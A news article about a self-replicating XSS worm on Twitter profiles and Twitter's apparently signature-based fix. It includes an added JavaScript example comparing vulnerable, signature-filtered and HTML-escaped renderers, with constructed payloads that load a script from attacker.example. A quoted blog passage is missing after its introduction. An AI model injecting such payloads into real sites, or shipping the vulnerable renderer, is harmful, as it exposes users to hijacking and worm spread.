Twitter was hit over the weekend by powerful, self-replicating attacks that caused people to flood the micro-blogging site with tens of thousands of messages simply by viewing booby-trapped user profiles.
As is frequently the case with XSS-based attacks, the worm was unable to prey on those using the NoScript add-on for the Firefox browser.
Twitter's security team blocked the attack for a while, but a new assault that used "mildly obfuscated" code soon defeated the countermeasure, raising the possibility that the block relied on detecting the signature of the original attack rather than on fixing the underlying bug that made the XSS possible in the first place.
"The existence of a mildly obfuscated version authorizes a scary suspect: have Twitter guys just been trying to block the original strain by signature, rather than fixing their website error?" Italian researcher and NoScript creator Giorgio Maone wrote here. "This would be ridiculous, since any script kiddie can create his own slightly modified version for fun or profit (and is probably doing that)."
It's not the first time Twitter has been slow to react to vulnerabilities on its site that allow self-replicating attacks against its users. The San Francisco-based company took more than 24 hours to close a separate hole discovered by white-hat hackers last month, while many of the company's employees attended the South by Southwest conference in Austin, Texas.
"We are still reviewing all the details, cleaning up, and we remain on alert," Twitter co-founder Biz Stone wrote Sunday. "Every time we battle an attack, we evaluate our web coding practices to learn how we can do better to prevent them in the future."
Stone declined to answer questions including exactly what changes the company planned and how many accounts were infected. He also wouldn't say whether Twitter officials had alerted the FBI or other law-enforcement authorities.
The weekend attacks are reminiscent of other XSS-borne worms that have menaced the web. The most notorious of those was the Samy worm of 2005, which knocked MySpace out of commission when it added more than one million MySpace friends to a user named Samy. The author was later convicted.
An individual has claimed responsibility for the Twitter attacks, saying here he created the worm "out of boredom". His identity and claims could not be immediately confirmed.
If you think worms on social networking sites are harmless you should think again. Twitter in particular has become a platform for countless companies, organizations and celebrities to share updates with followers who blindly click on any link provided. The attacks so far have been innocuous only because the attackers have lacked sufficient malice.
XSS attacks are serious because they allow miscreants to inject code of their choosing into websites trusted by millions of users, where it runs in victims' browsers with the site's own privileges. From there, attackers can perform drive-by malware installations, steal authentication cookies and other log-in credentials, or, as in this case, act in the victim's name to spread further.
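The contrast the article draws, between blocking a known strain by signature and fixing the bug that lets untrusted profile text become markup, is easy to show in code. The following JavaScript is an added example written for this page; it is not Twitter's code, the worm's code, or anything from Maone. The profile renderer, the `attacker.example` host, the payload strings and the helper names are all constructed for illustration.

```javascript
// Added example, not taken from Twitter's code or from the worm itself.
// Three ways of handling an untrusted profile "bio" before it reaches the
// browser, plus a crude check for whether a payload comes out as live
// markup. All payloads and the attacker.example host are constructed.

// Constructed "original strain": a script tag that would load the worm.
const ORIGINAL_STRAIN =
  '<script src="http://attacker.example/x.js"></script>';

// Constructed "mildly obfuscated" variants that deliver the same payload.
const OBFUSCATED_STRAINS = [
  // Same tag, different case and an extra space: byte-for-byte different.
  '<ScRiPt  src="http://attacker.example/x.js"></ScRiPt>',
  // No script tag at all: an inline event handler injects the same script.
  '<img src=x onerror="var s=document.createElement(\'script\');' +
    "s.src='http://attacker.example/x.js';document.body.appendChild(s)\">",
];

// 1. Vulnerable: untrusted text concatenated straight into the page.
function renderProfileVulnerable(username, bio) {
  return `<div class="profile"><h1>${username}</h1>` +
    `<p class="bio">${bio}</p></div>`;
}

// 2. Signature block: drop any bio containing a known-bad string. This is
//    the kind of countermeasure Maone suspected; it knows one strain only.
const KNOWN_BAD = [ORIGINAL_STRAIN];
function signatureFilter(bio) {
  return KNOWN_BAD.some((sig) => bio.includes(sig)) ? '' : bio;
}
function renderProfileFiltered(username, bio) {
  return renderProfileVulnerable(username, signatureFilter(bio));
}

// 3. The fix: encode every character that has meaning in HTML, so the bio
//    can only ever be text no matter what it contains.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}
function renderProfileSafe(username, bio) {
  return `<div class="profile"><h1>${escapeHtml(username)}</h1>` +
    `<p class="bio">${escapeHtml(bio)}</p></div>`;
}

// Crude stand-in for a browser: does the output still contain a script tag
// or an inline event handler attribute? A real browser would run either.
function survivesAsMarkup(html) {
  return /<script[\s>]/i.test(html) || /<[a-z]+[^>]*\son[a-z]+\s*=/i.test(html);
}

// Count how many of the given strains a renderer lets through as markup.
function liveStrainCount(render, strains) {
  return strains.filter((bio) => survivesAsMarkup(render('victim', bio))).length;
}

const ALL_STRAINS = [ORIGINAL_STRAIN, ...OBFUSCATED_STRAINS];
for (const [name, render] of [
  ['vulnerable', renderProfileVulnerable],
  ['signature-filtered', renderProfileFiltered],
  ['html-encoded', renderProfileSafe],
]) {
  // Expected: vulnerable 3 of 3, signature-filtered 2 of 3, html-encoded 0 of 3.
  console.log(`${name}: ${liveStrainCount(render, ALL_STRAINS)} of ${ALL_STRAINS.length} strains live`);
}
```

The signature filter stops exactly the string it was given and nothing else, which is why a casing change or a switch to an event handler walks straight past it; the encoder has no list to maintain because it never lets the value become markup at all. Entity encoding as shown is the right treatment for the HTML text and attribute-value contexts; a value placed into a URL, a script block or a style needs its own context-specific encoder, and a Content-Security-Policy that forbids inline script is a worthwhile second layer behind it. `survivesAsMarkup` is a deliberately crude check for this example, not a parser; browsers accept far more payload shapes than the two patterns it looks for.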
And that's just the beginning. As the Dcortesi blog states:
Until Twitter can give better assurances about its procedures for keeping its considerable user base safe from attack, you may want to think twice about clicking on links and user profiles, even when they appear to come from people you know and trust. The site is in the middle of an arms race, and so far it's not at all clear who has the upper hand. ®